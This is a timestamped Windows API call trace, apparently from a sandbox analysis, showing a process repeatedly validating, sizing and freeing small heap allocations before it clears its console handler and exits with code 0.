[0191.330] GetProcessHeap () returned 0x720000 [0191.330] GetProcessHeap () returned 0x720000 [0191.330] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x7229a0) returned 1 [0191.330] GetProcessHeap () returned 0x720000 [0191.330] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7229a0) returned 0x14 [0191.330] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7229a0 | out: hHeap=0x720000) returned 1 [0191.331] GetProcessHeap () returned 0x720000 [0191.331] GetProcessHeap () returned 0x720000 [0191.331] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c120) returned 1 [0191.331] GetProcessHeap () returned 0x720000 [0191.331] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c120) returned 0x14 [0191.331] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c120 | out: hHeap=0x720000) returned 1 [0191.331] GetProcessHeap () returned 0x720000 [0191.331] GetProcessHeap () returned 0x720000 [0191.332] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c3e0) returned 1 [0191.332] GetProcessHeap () returned 0x720000 [0191.332] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c3e0) returned 0x14 [0191.332] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c3e0 | out: hHeap=0x720000) returned 1 [0191.332] GetProcessHeap () returned 0x720000 [0191.332] GetProcessHeap () returned 0x720000 [0191.332] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x728298) returned 1 [0191.332] GetProcessHeap () returned 0x720000 [0191.333] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x728298) returned 0x30 [0191.333] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x728298 | out: hHeap=0x720000) returned 1 [0191.333] GetProcessHeap () returned 0x720000 [0191.334] GetProcessHeap () returned 0x720000 [0191.334] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c2e0) returned 1 [0191.334] GetProcessHeap () returned 0x720000 [0191.334] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c2e0) returned 0x14 [0191.334] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c2e0 | out: hHeap=0x720000) returned 1 [0191.334] GetProcessHeap () returned 0x720000 [0191.334] GetProcessHeap () returned 0x720000 [0191.334] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x723850) returned 1 [0191.334] GetProcessHeap () returned 0x720000 [0191.334] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x723850) returned 0x24 [0191.335] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x723850 | out: hHeap=0x720000) returned 1 [0191.335] GetProcessHeap () returned 0x720000 [0191.335] GetProcessHeap () returned 0x720000 [0191.335] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c140) returned 1 [0191.335] GetProcessHeap () returned 0x720000 [0191.335] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c140) returned 0x14 [0191.335] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c140 | out: hHeap=0x720000) returned 1 [0191.335] GetProcessHeap () returned 0x720000 [0191.336] GetProcessHeap () returned 0x720000 [0191.336] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x726f50) returned 1 [0191.336] GetProcessHeap () returned 0x720000 [0191.336] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x726f50) returned 0x4c [0191.336] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x726f50 | out: hHeap=0x720000) returned 1 [0191.337] GetProcessHeap () returned 0x720000 [0191.337] GetProcessHeap () returned 0x720000 [0191.337] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c260) returned 1 [0191.337] GetProcessHeap () returned 0x720000 [0191.337] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c260) returned 0x14 [0191.337] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c260 | out: hHeap=0x720000) returned 1 [0191.337] GetProcessHeap () returned 0x720000 [0191.337] GetProcessHeap () returned 0x720000 [0191.337] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x727430) returned 1 [0191.337] GetProcessHeap () returned 0x720000 [0191.338] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x727430) returned 0x10 [0191.338] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x727430 | out: hHeap=0x720000) returned 1 [0191.338] GetProcessHeap () returned 0x720000 [0191.338] GetProcessHeap () returned 0x720000 [0191.338] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x723730) returned 1 [0191.338] GetProcessHeap () returned 0x720000 [0191.338] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x723730) returned 0x14 [0191.339] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x723730 | out: hHeap=0x720000) returned 1 [0191.339] GetProcessHeap () returned 0x720000 [0191.339] GetProcessHeap () returned 0x720000 [0191.339] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x726ec8) returned 1 [0191.339] GetProcessHeap () returned 0x720000 [0191.339] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x726ec8) returned 0x14 [0191.339] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x726ec8 | out: hHeap=0x720000) returned 1 [0191.339] GetProcessHeap () returned 0x720000 [0191.339] GetProcessHeap () returned 0x720000 [0191.346] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x726ee8) returned 1 [0191.346] GetProcessHeap () returned 0x720000 [0191.346] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x726ee8) returned 0x14 [0191.346] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x726ee8 | out: hHeap=0x720000) returned 1 [0191.346] GetProcessHeap () returned 0x720000 [0191.346] GetProcessHeap () returned 0x720000 [0191.346] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x726f08) returned 1 [0191.346] GetProcessHeap () returned 0x720000 [0191.346] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x726f08) returned 0x14 [0191.346] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x726f08 | out: hHeap=0x720000) returned 1 [0191.346] GetProcessHeap () returned 0x720000 [0191.347] GetProcessHeap () returned 0x720000 [0191.347] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x7273a0) returned 1 [0191.347] GetProcessHeap () returned 0x720000 [0191.347] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7273a0) returned 0x10 [0191.347] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7273a0 | out: hHeap=0x720000) returned 1 [0191.347] GetProcessHeap () returned 0x720000 [0191.347] GetProcessHeap () returned 0x720000 [0191.347] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x727980) returned 1 [0191.347] GetProcessHeap () returned 0x720000 [0191.347] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x727980) returned 0x14 [0191.347] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x727980 | out: hHeap=0x720000) returned 1 [0191.348] GetProcessHeap () returned 0x720000 [0191.348] GetProcessHeap () returned 0x720000 [0191.348] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c460) returned 1 [0191.348] GetProcessHeap () returned 0x720000 [0191.348] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c460) returned 0x14 [0191.348] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c460 | out: hHeap=0x720000) returned 1 [0191.348] GetProcessHeap () returned 0x720000 [0191.348] GetProcessHeap () returned 0x720000 [0191.348] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c4c0) returned 1 [0191.348] GetProcessHeap () returned 0x720000 [0191.348] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c4c0) returned 0x14 [0191.349] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c4c0 | out: hHeap=0x720000) returned 1 [0191.349] GetProcessHeap () returned 0x720000 [0191.349] GetProcessHeap () returned 0x720000 [0191.349] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c320) returned 1 [0191.349] GetProcessHeap () returned 0x720000 [0191.349] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c320) returned 0x14 [0191.349] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c320 | out: hHeap=0x720000) returned 1 [0191.349] GetProcessHeap () returned 0x720000 [0191.349] GetProcessHeap () returned 0x720000 [0191.349] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c3a0) returned 1 [0191.349] GetProcessHeap () returned 0x720000 [0191.349] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c3a0) returned 0x14 [0191.350] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c3a0 | out: hHeap=0x720000) returned 1 [0191.350] GetProcessHeap () returned 0x720000 [0191.350] GetProcessHeap () returned 0x720000 [0191.350] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c4a0) returned 1 [0191.350] GetProcessHeap () returned 0x720000 [0191.350] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c4a0) returned 0x14 [0191.350] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c4a0 | out: hHeap=0x720000) returned 1 [0191.350] GetProcessHeap () returned 0x720000 [0191.350] GetProcessHeap () returned 0x720000 [0191.351] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c480) returned 1 [0191.351] GetProcessHeap () returned 0x720000 [0191.351] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c480) returned 0x14 [0191.351] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c480 | out: hHeap=0x720000) returned 1 [0191.351] GetProcessHeap () returned 0x720000 [0191.351] GetProcessHeap () returned 0x720000 [0191.351] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x7273b8) returned 1 [0191.351] GetProcessHeap () returned 0x720000 [0191.351] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7273b8) returned 0x10 [0191.351] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7273b8 | out: hHeap=0x720000) returned 1 [0191.351] GetProcessHeap () returned 0x720000 [0191.351] GetProcessHeap () returned 0x720000 [0191.352] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x72c160) returned 1 [0191.352] GetProcessHeap () returned 0x720000 [0191.352] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x72c160) returned 0x14 [0191.352] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72c160 | out: hHeap=0x720000) returned 1 [0191.352] GetProcessHeap () returned 0x720000 [0191.352] GetProcessHeap () returned 0x720000 [0191.352] HeapValidate (hHeap=0x720000, dwFlags=0x0, lpMem=0x727568) returned 1 [0191.352] GetProcessHeap () returned 0x720000 [0191.352] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x727568) returned 0x10 [0191.352] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x727568 | out: hHeap=0x720000) returned 1 [0191.352] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0191.353] exit (_Code=0) Thread: id = 178 os_tid = 0xcbc